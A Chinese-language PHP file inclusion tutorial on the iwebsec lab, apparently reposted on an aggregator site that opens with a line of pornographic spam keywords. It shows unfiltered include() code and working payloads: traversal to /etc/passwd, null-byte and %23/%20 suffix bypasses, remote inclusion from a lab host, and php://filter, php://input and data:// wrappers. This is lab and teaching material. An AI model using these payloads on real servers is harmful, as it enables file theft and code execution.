国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

這篇具有很好參考價值的文章主要介紹了Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Web安全:文件包含漏洞測試.

文件包含的漏洞是? 程序員在開發(fā)網(wǎng)站的時候,為了方便自己開發(fā)構(gòu)架,使用了一些包含的函數(shù)(比如:php開發(fā)語言,include() , include_once() , require_once() 等等?),而且包含函數(shù)中的變量,沒有做一些過濾或者限制,使得用戶可以 控制傳到服務(wù)器中的數(shù)據(jù),導(dǎo)致文件包含漏洞。


目錄:

Web安全:文件包含漏洞測試.

文件包含漏洞的執(zhí)行規(guī)則:

?文件包含漏洞測試:

(1)本地文件包含.

(2)本地文件包含繞過.

(3)遠(yuǎn)程文件包含.

(4)遠(yuǎn)程文件包含繞過.

(5)php // filter 偽協(xié)議.

(6)php // input 偽協(xié)議.

(7)file:// 偽協(xié)議利用.

(8)data:// 偽協(xié)議.


文件包含漏洞的執(zhí)行規(guī)則:

文件包含漏洞可以怎么理解,就是一個 A 文件包含著另一個 B 文件,將包含著 B 文件里面的內(nèi)容,
以這個網(wǎng)站的腳本代碼 去執(zhí)行(如果你的網(wǎng)站是php就是php去執(zhí)行文件里面的內(nèi)容,如果你的網(wǎng)站是
python,那就是python去執(zhí)行文件里面的內(nèi)容)
測試使用的靶場是:iwebsec 靶場

搭建過程:https://tianyuk.blog.csdn.net/article/details/130341391

文件包含漏洞測試:

(1)本地文件包含.

原理:本地文件包含是通過瀏覽器包含Web服務(wù)器上的文件,這種漏洞是因為瀏覽器包含文件時沒有
進行嚴(yán)格的過濾,導(dǎo)致允許遍歷目錄的字符注入瀏覽器中,然后進行執(zhí)行.
代碼審計:

<?php
	if(isset($_GET['filename'])){            // 可以查看沒有進行任何過濾
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
?>
測試代碼:(讀取服務(wù)器中的 test.tst 文件,然后成功執(zhí)行了文件中的代碼.)

?filename=test.txt

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

測試代碼:(如果不知道,服務(wù)器中的文件在哪,則使用../../../../../)(可以多加幾個../)
然后再重新從一個文件,一步一步進行查看.

?filename=../../../../../etc/passwd

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(2)本地文件包含繞過.

代碼審計:

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename . ".html");        //可以看見只能使用指定后綴.(.html)
	}else{
		exit();
	}
?>
繞過限制指定后綴的方法:使用(%00)進行截斷.
測試代碼:

?filename=test.txt%00 

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

測試代碼:

?filename=../../../../../etc/passwd%00

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(3)遠(yuǎn)程文件包含.

遠(yuǎn)程文件包含就是通過URL的形式包含的其他服務(wù)器上面的文件,從而使目標(biāo)主機執(zhí)行惡意代碼攻擊.
代碼審計:

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);                //可以看見沒有任何過濾,可以直接遠(yuǎn)程包含攻擊
	}else{
		exit();
	}
?>
測試代碼:(添加另一個服務(wù)器的文件鏈接)

?filename=http://192.168.0.105:801/bgxg.txt

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(4)遠(yuǎn)程文件包含繞過.

代碼審計:

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename . ".html");         //可以看見只能使用指定后綴.(.html)
	}else{
		exit();
	}
?>
繞過限制指定后綴的方法:

(1) # 繞過 (%23)
 
(2) 空格 繞過 (%20)
測試代碼:(添加另一個服務(wù)器的文件鏈接)(加 %23 【#】進行繞過限制)

?filename=http://192.168.0.105:801/bgxg.txt%23

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

測試代碼:(添加另一個服務(wù)器的文件鏈接)(加 空格 【%20】進行繞過限制)

?filename=http://192.168.0.105:801/bgxg.txt%20

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(5)php // filter 偽協(xié)議.

php://filter 是一種元封裝器,是PHP中特有的協(xié)議流,設(shè)計用于數(shù)據(jù)流打開時的篩選過濾應(yīng)用,常用于讀取文件.
代碼審計:

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);                    //可以看見沒有任何過濾
	}else{
		exit();
	}
?>
測試代碼:

?filename=php://filter/convert.base64-encode/resource=文件路徑

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(6)php // input 偽協(xié)議.

php//input任意代碼執(zhí)行;這種偽協(xié)議用于讀取原始的 HTTP POST 數(shù)據(jù),可以用于處理上傳的文件和表單數(shù)據(jù).
代碼審計:

代碼 1: (如果是 GET 方式,php://input 就可以用了)

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);                    //可以看見沒有任何過濾
	}else{
		exit();
	}
?>

代碼 2:(如果是 POST 方式,php://input 就不能用了)

<?php
    echo file_get_contents("php://input");
?>
測試代碼:

?filename=php://input 

<?php phpinfo(); ?>        //顯示服務(wù)器信息.

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(7)file:// 偽協(xié)議利用.

代碼審計:

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
?>
測試代碼:(?filename=file:///文件路徑)

?filename=file:///etc/passwd

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)


(8)data:// 偽協(xié)議.

主要用于數(shù)據(jù)流的讀取,如果傳入的數(shù)據(jù)是PHP代碼,就會執(zhí)行任意代碼.
?filename=data://text/plain;base64,(base64編碼后數(shù)據(jù))

<?php phpinfo();?>         base64編碼后       PD9waHAgcGhwaW5mbygpOz8+

base64編碼 在線工具:https://c.runoob.com/front-end/693/

然后再把 +  url編碼 變?yōu)?%2b

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

測試代碼:

?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)

? ? ?

? ??

? ?文章來源地址http://www.zghlxwxcb.cn/news/detail-474407.html

到了這里,關(guān)于Web安全:文件包含漏洞測試(防止 黑客利用此漏洞.)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 【web安全】文件包含漏洞

    【web安全】文件包含漏洞

    目錄 1.什么是文件包含漏洞 2.產(chǎn)生原因 3.文件包含的類型 3.1本地文件包含 3.2遠(yuǎn)程文件包含 4.攻擊利用手法 4.1 file:協(xié)議 4.2 php://協(xié)議 ?4.3 zip://,bzip2://,zlib://協(xié)議? 4.4 data://協(xié)議 4.5 PHP偽協(xié)議總結(jié)? 5.如何防御? 6.常見系統(tǒng)的默認(rèn)路徑 7.文件包含漏洞的奇技淫巧 LFI+日志文件gets

    2024年02月07日
    瀏覽(23)
  • 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

    【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

    我們可以利用文件包含漏洞讀取任意文件,讀取文件的時候有利用條件 目標(biāo)主機文件存在(目標(biāo)文件的路徑、絕對路徑、相對路徑) 具有文件可讀權(quán)限 提交參數(shù) http://localhost/include/include.php?path=C:windowssystem32driversetchosts ,讀取本地host文件 提交參數(shù) http://localhost/include/includ

    2024年02月11日
    瀏覽(18)
  • 文件包含漏洞利用和防御

    使用函數(shù)包含指定文件的代碼,沒對函數(shù)的參數(shù)進行過濾,可被用戶控制包含惡意文件并執(zhí)行代碼 漏洞分類 本地文件包含:目錄遍歷、任意文件讀取、包含日志文件getshell、圖片馬getshell、偽協(xié)議讀取文件/命令執(zhí)行、包含phpinfo上傳的臨時文件 遠(yuǎn)程文件包含:遠(yuǎn)程木馬getshe

    2024年02月02日
    瀏覽(62)
  • 文件包含漏洞利用思路

    文件包含漏洞利用思路

    通過 PHP 函數(shù)引入文件時,傳入的文件名沒有經(jīng)過合理的驗證,從而操作了預(yù)想之外的文件,導(dǎo)致意外的文件泄漏甚至惡意代碼注入。 php中常見的文件包含函數(shù)有以下四種: include() require() include_once() require_once() include與require基本是相同的,除了錯誤處理方面: include(),只生成

    2024年02月16日
    瀏覽(25)
  • PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞中,如果找不到可以包含的文件,我們可以通過包含臨時文件的方法來拿到權(quán)限。因為臨時文件名是隨機的,如果目標(biāo)網(wǎng)站上存在phpinfo,則可以通過phpinfo來獲取臨時文件名,進而進行包含。 在給PHP發(fā)送POST數(shù)據(jù)包時,如果數(shù)據(jù)包里包含文件區(qū)塊,無論你訪問的

    2024年02月16日
    瀏覽(23)
  • 學(xué)習(xí)前端安全:防止常見的Web攻擊和漏洞:簡單而有效

    作者:禪與計算機程序設(shè)計藝術(shù) 安全是所有Web開發(fā)人員都需要關(guān)注的一個重要方面,因為信息在網(wǎng)絡(luò)上傳輸時都存在各種隱患。攻擊者利用這些隱患對我們的網(wǎng)站造成破壞,甚至導(dǎo)致服務(wù)器被入侵。因此,在Web開發(fā)過程中,我們需要對安全問題保持警惕并采取必要的措施保障

    2024年02月11日
    瀏覽(18)
  • Web漏洞-文件包含漏洞超詳細(xì)全解(附實例)

    Web漏洞-文件包含漏洞超詳細(xì)全解(附實例)

    目錄 一、導(dǎo)圖 二、文件包含漏洞 1.腳本代碼 2.原理演示 3.漏洞成因 4.檢測方法 5.類型分類 三、本地文件包含漏洞的利用 無限制本地文件包含 有限制本地文件包含 四、遠(yuǎn)程文件包含漏洞的利用 無限制遠(yuǎn)程文件包含 有限制遠(yuǎn)程文件包含 五、協(xié)議的玩法 讀取文件內(nèi)容 執(zhí)行代

    2023年04月25日
    瀏覽(21)
  • 你寫的防止任意文件上傳漏洞的代碼,不一定安全

    上傳一個PHP文件,提示文件類型錯誤,使用ApiPost修改上傳的Content-Type,把原先的application/x-httpd-php修改為image/png,則可繞過。 因為: $_FILES[\\\'type\\\']是根據(jù)上傳文件的content-type獲取的,并文件本身的mime-type,而content-type又可以被篡改。 說話得有依據(jù),經(jīng)過反復(fù)的追Laravel的源碼:

    2024年02月04日
    瀏覽(20)
  • 【網(wǎng)絡(luò)安全】文件包含漏洞解析

    【網(wǎng)絡(luò)安全】文件包含漏洞解析

    博主昵稱:跳樓梯企鵝 博主主頁面鏈接: 博主主頁傳送門 博主專欄頁面連接: 專欄傳送門--網(wǎng)路安全技術(shù) 創(chuàng)作初心:本博客的初心為與技術(shù)朋友們相互交流,每個人的技術(shù)都存在短板,博主也是一樣,虛心求教,希望各位技術(shù)友給予指導(dǎo)。 博主座右銘:發(fā)現(xiàn)光,追隨光,

    2024年02月01日
    瀏覽(27)
  • Web安全——Web安全漏洞與利用上篇(僅供學(xué)習(xí))

    Web安全——Web安全漏洞與利用上篇(僅供學(xué)習(xí))

    漏洞描述 ??Web 程序代碼中對于用戶提交的參數(shù)未做過濾就直接放到 SQL 語句中執(zhí)行,導(dǎo)致參數(shù)中的特殊字符打破了 SQL 語句原有邏輯,黑客可以利用該漏洞執(zhí)行任意 SQL 語句,如查詢數(shù)據(jù)、下載數(shù)據(jù)、寫入 webshell 、執(zhí)行系統(tǒng)命令以及繞過登錄限制等。 測試方法 ?? 在發(fā)現(xiàn)

    2024年02月10日
    瀏覽(27)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包